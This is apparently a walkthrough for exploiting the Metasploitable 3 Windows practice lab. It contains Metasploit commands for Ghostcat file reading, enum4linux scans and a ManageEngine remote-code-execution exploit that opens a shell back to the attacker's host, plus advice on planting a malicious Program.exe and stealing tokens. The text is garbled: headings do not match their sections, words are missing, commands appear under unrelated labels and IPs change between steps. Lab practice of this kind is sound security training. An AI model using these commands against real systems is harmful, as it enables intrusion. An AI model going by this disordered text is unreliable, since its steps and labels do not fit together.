Metasploitable 3 Windows Walkthrough

Metasploitable 3 is a premier target environment for security professionals to hone their penetration testing skills. Unlike its predecessor, this version includes a dedicated Windows environment filled with deliberate vulnerabilities, misconfigurations, and weak credentials.

This feature allows you to pivot from basic reconnaissance to a full command shell by exploiting a design flaw in the Elasticsearch scripting engine (CVE-2014-3120). : Elasticsearch version 1.1.1.

use post/multi/recon/local_exploit_suggester
set SESSION 1
run

enum4linux -a 192.168.1.105

Try default credentials:

enum4linux -a 192.168.56.102

Metasploitable 3 Windows is designed to be exploited in multiple ways. We will focus on two common vectors: and SMB.

Method 1: Exploiting Adobe ColdFusion (Port 8500)

The Ghostcat vulnerability (CVE-2020-1938) affects the Apache JServ Protocol (AJP) connector in Tomcat. It allows attackers to read arbitrary files from a vulnerable Tomcat server, including sensitive configuration files containing credentials.

If the current user has write access to C:\, drop a malicious executable named Program.exe into C:\.

msf6 > use auxiliary/admin/http/tomcat_ghostcat
msf6 auxiliary(admin/http/tomcat_ghostcat) > set RHOST 10.0.2.6
msf6 auxiliary(admin/http/tomcat_ghostcat) > set RPORT 8009
msf6 auxiliary(admin/http/tomcat_ghostcat) > run

While modern Windows is more resilient, the 2012 R2 base allows for older exploits if updates are withheld.

Token Impersonation: If the initial foothold is a service account, tools like can be used to steal tokens from logged-in administrators.

Conclusion: Lessons in Modern Vulnerability

Once we have access to the system, we can perform various post-exploitation activities, such as:

msf6 > use auxiliary/scanner/smb/smb_version
msf6 > set RHOSTS 192.168.56.102
msf6 > run

msf6 > use exploit/windows/http/manageengine_desktop_central_rce
msf6 exploit(windows/http/manageengine_desktop_central_rce) > set RHOST 10.0.2.6
msf6 exploit(windows/http/manageengine_desktop_central_rce) > set LHOST 10.0.2.15
msf6 exploit(windows/http/manageengine_desktop_central_rce) > set LPORT 4444
msf6 exploit(windows/http/manageengine_desktop_central_rce) > run

Copyright © 2010-2021 Allstyling.Ru